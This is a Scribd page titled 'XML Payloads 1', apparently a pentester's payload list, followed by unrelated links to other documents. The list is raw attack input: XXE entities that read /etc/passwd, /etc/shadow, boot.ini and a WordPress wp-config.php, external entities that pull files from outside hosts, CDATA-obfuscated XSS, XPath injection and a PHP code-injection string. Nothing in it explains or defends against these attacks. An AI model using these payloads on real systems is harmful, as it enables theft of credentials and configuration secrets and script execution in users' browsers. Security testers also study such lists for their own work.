XML Payloads 1

The document contains code snippets attempting to exploit various XML external entity (XXE), cross-site scripting (XSS), and remote file inclusion (RFI) vulnerabilities. There are entities defined to load internal files from the server filesystem as well as external files from remote URLs. Script tags and entities are used in attempts to execute malicious JavaScript. The goal appears to be performing unauthorized actions and accessing restricted files or websites.

Uploaded by

Rahul M

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

54 views

XML Payloads 1

Uploaded by

Rahul M

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 3

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!

ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///etc/passwd"> ]>
<!DOCTYPE foo [<!ENTITY xxe7eb97 SYSTEM "file:///c:/boot.ini"> ]>
<!DOCTYPE foo [<!ENTITY xxe46471 SYSTEM
"http://crowdshield.com/.testing/rfi_vuln.txt"> ]>
<?xml version="1.0"?
><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>
<?xml version="1.0"?><change-log><text>Hello World</text></change-log>
<?xml version="1.0"?><change-log><text>"Hello World"</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"> ]><change-
log><text>Hello &myEntity;</text></change-log>
<?xml version="1.0"?><!DOCTYPE change-log[ <!ENTITY myEntity "World"><!ENTITY
myQuote """> ]><change-log><text>&myQuote;Hello
&myEntity;&myQuote;</text></change-log>
<!ENTITY systemEntity SYSTEM "robots.txt">
<change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"robots.txt"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"../../../../boot.ini"> ]> <change-log> <text>&systemEntity;</text> </change-log>
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"robots.txt"> ]> <change-log> <text>&systemEntity;</text>; </change-log>
<test> $lDOMDocument->textContent=<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')<!
[CDATA[<]]>/script<![CDATA[>]]> </test>
<?xml version="1.0"?><change-log><text><script>alert(1)</script></text></change-
log>
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<!
[CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM
"https://crowdshield.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!
ENTITY xxe SYSTEM
"http://xerosecurity.com/.testing/rfi_vuln.txt">]><foo>&xxe;</foo>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>"
<xml ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></xml><SPAN
DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
<xml SRC="https://crowdshield.com/.testing/rfi_vuln.txt" ID=I></xml><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
<HTML xmlns:xss><?import namespace="xss"
implementation="https://crowdshield.com/.testing/xss.html"><xss:xss>XSS</xss:xss></
HTML>
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<xml ID="xss"><I><B><IMG SRC="javascript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<xml SRC="https://crowdshield.com/.testing/xss.html" ID=I></xml><SPAN DATASRC=#I
DATAFLD=C DATAFORMATAS=HTML></SPAN>
<?xml version='1.0' standalone='no'?><!DOCTYPE foo [<!ENTITY % f5a30 SYSTEM
"https://crowdshield.com/.testing/rfi_vuln.txt">%f5a30; ]>
‘
“
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM
"../../../boot.ini" ]> <change-log> <text>&systemEntity;</text>; </change-log>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY
xxe SYSTEM "php://filter/read-convert.base64-encode/resource=file:///C:/boot.ini"
>]><doc><test>Contents of file: &xxe;</test></doc>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "https://crowdshield.com/.testing/rfi.txt" >]><foo>&xxe;</foo>
"}}</script><script>alert(1);</script></body></html>cript:alert('XSS')"></B></I></xml><SPAN
DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN
DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C
DATAFORMATAS=HTML></SPAN>
<HTML xmlns:xss><?import namespace="xss"
implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE doc [<!ELEMENT test ANY ><!ENTITY
xxe SYSTEM "php://filter/read-convert.base64-
encode/resource=file:///C:/htdocs/wordpress/wp-config.php" >]><doc><test>Contents
of file: &xxe;</test></doc>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!
ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo><?xml version="1.0"
encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM
"file:///etc/shadow">]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY ><!
ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo> <?xml version="1.0"
encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM
"http://www.attacker.com/text.txt">]><foo>&xxe;</foo>
}}</script><script>alert(1);</script></body></html><!--
"}}</script>'
}}</script>""'"
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM
"file:///etc/passwd" > ]><svg width="500px" height="40px"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1">&xxe;</svg>
<?xml version="1.0" standalone="yes"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM
"file:///etc/passwd" > ]><svg width="500px" height="100px"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1"><text font-family="Verdana" font-size="16" x="10"
y="40">&xxe;</text></svg>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

Metasploit
0% (2)
Metasploit
1,906 pages
Regedit Medio Completo
No ratings yet
Regedit Medio Completo
2 pages
All Google Hacking Keywords
100% (1)
All Google Hacking Keywords
16 pages
3BUF001094-600 B en
No ratings yet
3BUF001094-600 B en
727 pages
Dumps of Mulesoft Certification Training Exam
100% (2)
Dumps of Mulesoft Certification Training Exam
117 pages
STAR Method: How To Answer Behavioral Interview Questions (10+ Tips)
100% (4)
STAR Method: How To Answer Behavioral Interview Questions (10+ Tips)
12 pages
DSL-2730U: Firmware Release Notes
100% (1)
DSL-2730U: Firmware Release Notes
13 pages
139 Xml-Attacks
No ratings yet
139 Xml-Attacks
4 pages
2.1 XML
No ratings yet
2.1 XML
4 pages
XXE Exploitation
No ratings yet
XXE Exploitation
44 pages
2 Vorontsov XXE
No ratings yet
2 Vorontsov XXE
14 pages
M
No ratings yet
M
63 pages
Атака XXE
No ratings yet
Атака XXE
30 pages
0day Security
No ratings yet
0day Security
30 pages
all-attacks-unix
No ratings yet
all-attacks-unix
10 pages
A4 - XML External Entity (Xxe) Attack: © 2020 Nexusguard Limited - Confidential & Proprietary
No ratings yet
A4 - XML External Entity (Xxe) Attack: © 2020 Nexusguard Limited - Confidential & Proprietary
8 pages
BH Eu 13 XML Data Osipov Slides
No ratings yet
BH Eu 13 XML Data Osipov Slides
47 pages
Traversal
No ratings yet
Traversal
2 pages
Livro Teste 007
No ratings yet
Livro Teste 007
17 pages
Prep
No ratings yet
Prep
12 pages
AssuredSAN CLI Reference Guide - G222!83!00006922-10-01-A
No ratings yet
AssuredSAN CLI Reference Guide - G222!83!00006922-10-01-A
695 pages
En Localization v20
No ratings yet
En Localization v20
35 pages
Zumaroc Notes v2
No ratings yet
Zumaroc Notes v2
36 pages
Dork
No ratings yet
Dork
75 pages
Darkd0rk3r-1 0 Py
No ratings yet
Darkd0rk3r-1 0 Py
13 pages
Assessment 3
No ratings yet
Assessment 3
8 pages
md-to-pdf(2)
No ratings yet
md-to-pdf(2)
12 pages
Hacking Webpages
No ratings yet
Hacking Webpages
6 pages
XML Security: September 13, 2006 Robert Richards
No ratings yet
XML Security: September 13, 2006 Robert Richards
52 pages
Hindo
No ratings yet
Hindo
69 pages
New 5
No ratings yet
New 5
2 pages
Configuracion
No ratings yet
Configuracion
68 pages
Ativação Antivirus
No ratings yet
Ativação Antivirus
51 pages
ESTUDO DE CASO
No ratings yet
ESTUDO DE CASO
75 pages
Myriad Connect - Training - SCE2 SOAP Request
No ratings yet
Myriad Connect - Training - SCE2 SOAP Request
29 pages
Module 5 XML External Entities (XXE) Lab: Brought To You by
No ratings yet
Module 5 XML External Entities (XXE) Lab: Brought To You by
2 pages
Cis Rhel Linux RCL
No ratings yet
Cis Rhel Linux RCL
7 pages
Oracle Installation Steps On Linux (Centos Version)
No ratings yet
Oracle Installation Steps On Linux (Centos Version)
31 pages
Tools_JohnTheRipper
No ratings yet
Tools_JohnTheRipper
43 pages
Linux Lab Record
No ratings yet
Linux Lab Record
48 pages
Markup Write-Up: Wikipedia
No ratings yet
Markup Write-Up: Wikipedia
17 pages
Telnet Exploit
No ratings yet
Telnet Exploit
5 pages
adv_xml_and_web_srv
No ratings yet
adv_xml_and_web_srv
151 pages
Paypal XXE Via Ektron
100% (1)
Paypal XXE Via Ektron
10 pages
Ffuf
No ratings yet
Ffuf
2 pages
XML External Entity XXE Attack 1704716540
No ratings yet
XML External Entity XXE Attack 1704716540
19 pages
Msfnotes
No ratings yet
Msfnotes
4 pages
Pentesting Cheatsheet
No ratings yet
Pentesting Cheatsheet
33 pages
Google Hacking List 3
100% (1)
Google Hacking List 3
11 pages
Interesting Info
No ratings yet
Interesting Info
5 pages
How To Install
No ratings yet
How To Install
426 pages
XXE (XML External Entity) Vuln
100% (1)
XXE (XML External Entity) Vuln
13 pages
WT - 2
No ratings yet
WT - 2
13 pages
CTF IN WEB
No ratings yet
CTF IN WEB
84 pages
Linux/Unix/BSD Post-Exploitation Command List
No ratings yet
Linux/Unix/BSD Post-Exploitation Command List
8 pages
Chapter 4 - Gathering Information
No ratings yet
Chapter 4 - Gathering Information
38 pages
Es Localization v20
No ratings yet
Es Localization v20
37 pages
Ejpt-Cheatsheet Nolinks
No ratings yet
Ejpt-Cheatsheet Nolinks
51 pages
Network PT Commands 5 (1)
No ratings yet
Network PT Commands 5 (1)
5 pages
FreeSWITCH 1.0.6
From Everand
FreeSWITCH 1.0.6
Anthony Minessale
No ratings yet
Html5: QuickStudy Laminated Reference Guide
From Everand
Html5: QuickStudy Laminated Reference Guide
Robin Nixon
No ratings yet
Help from Heaven: Miracles Happen When You Believe
From Everand
Help from Heaven: Miracles Happen When You Believe
Carlos Vivas
No ratings yet
Windows Batch File Programming
From Everand
Windows Batch File Programming
Michael Elliott
2/5 (2)
On the Wallaby Track: Essential Australian Words and Phrases
From Everand
On the Wallaby Track: Essential Australian Words and Phrases
Laine Cunningham
No ratings yet
Cooking Light: Low Calorie Cooking the Paleo and Grain Free Way
From Everand
Cooking Light: Low Calorie Cooking the Paleo and Grain Free Way
Rhonda Price
No ratings yet
Understanding and Selecting A Database Activity Monitoring Solution
No ratings yet
Understanding and Selecting A Database Activity Monitoring Solution
23 pages
Android Cheat Sheet PDF
No ratings yet
Android Cheat Sheet PDF
4 pages
Android Debug Bridge Commands Cheat Sheet: Full List
No ratings yet
Android Debug Bridge Commands Cheat Sheet: Full List
6 pages
Jhaddix Lfi
No ratings yet
Jhaddix Lfi
16 pages
URL Redirection 1
No ratings yet
URL Redirection 1
1 page
False True False True False True False
No ratings yet
False True False True False True False
4 pages
Book 1 - Infotech English For Computer Users (4th Ed.) (Archives) (Complete)
No ratings yet
Book 1 - Infotech English For Computer Users (4th Ed.) (Archives) (Complete)
175 pages
Tuning Guide
No ratings yet
Tuning Guide
186 pages
Publish MS PPT To Your Google Site
No ratings yet
Publish MS PPT To Your Google Site
30 pages
Active Community Contributors Institute (ACCI) : First Monthly Examination
No ratings yet
Active Community Contributors Institute (ACCI) : First Monthly Examination
3 pages
Example Test Cases For Manual Testing PDF
14% (7)
Example Test Cases For Manual Testing PDF
2 pages
F
No ratings yet
F
89 pages
(Ebook) Google Apps Script: Web Application Development Essentials by James Ferreira ISBN 9781491946183, 1491946180 - The ebook with rich content is ready for you to download
100% (1)
(Ebook) Google Apps Script: Web Application Development Essentials by James Ferreira ISBN 9781491946183, 1491946180 - The ebook with rich content is ready for you to download
49 pages
(Ebook) .NET MAUI Community Toolkit Succinctly by Alessandro Del Sole ISBN 9781642002317, 1642002313pdf download
100% (4)
(Ebook) .NET MAUI Community Toolkit Succinctly by Alessandro Del Sole ISBN 9781642002317, 1642002313pdf download
45 pages
3.1 & 3.2
No ratings yet
3.1 & 3.2
70 pages
Digital Marketing Analytics: Course Code:-MKT306
No ratings yet
Digital Marketing Analytics: Course Code:-MKT306
5 pages
Black-Basta Technical-Analysis 2023
No ratings yet
Black-Basta Technical-Analysis 2023
47 pages
Font Awesome 5 Free's Cheatsheet: Brand Icons
No ratings yet
Font Awesome 5 Free's Cheatsheet: Brand Icons
5 pages
CVSS v3.0 Specification Document
No ratings yet
CVSS v3.0 Specification Document
25 pages
Google Cloud Messaging, Android Simple Tutorial For Beginner
100% (1)
Google Cloud Messaging, Android Simple Tutorial For Beginner
13 pages
Esxi Network Concepts - Vmware Administration Essentials
No ratings yet
Esxi Network Concepts - Vmware Administration Essentials
9 pages
Basic Linux Commands
No ratings yet
Basic Linux Commands
39 pages
Inventory Management System
No ratings yet
Inventory Management System
98 pages
Test Network Latency Between VMs
No ratings yet
Test Network Latency Between VMs
15 pages
QGIS 3.16 DesktopUserGuide BG
No ratings yet
QGIS 3.16 DesktopUserGuide BG
1,341 pages
AXIS C3003-E Network Speaker: User Manual
No ratings yet
AXIS C3003-E Network Speaker: User Manual
40 pages
TechnoTween Module 1 - Animator - S Tool TechnoKids PH
No ratings yet
TechnoTween Module 1 - Animator - S Tool TechnoKids PH
13 pages
Service Level Agreements Summary - Microsoft Azure
No ratings yet
Service Level Agreements Summary - Microsoft Azure
34 pages
Grant Lotto Format PDF Money Facebook
No ratings yet
Grant Lotto Format PDF Money Facebook
1 page
Kolej Universiti Linton Assignment Brief (HND)
No ratings yet
Kolej Universiti Linton Assignment Brief (HND)
7 pages

XML Payloads 1

Uploaded by

XML Payloads 1

Uploaded by

<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ELEMENT foo ANY><!

ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

You might also like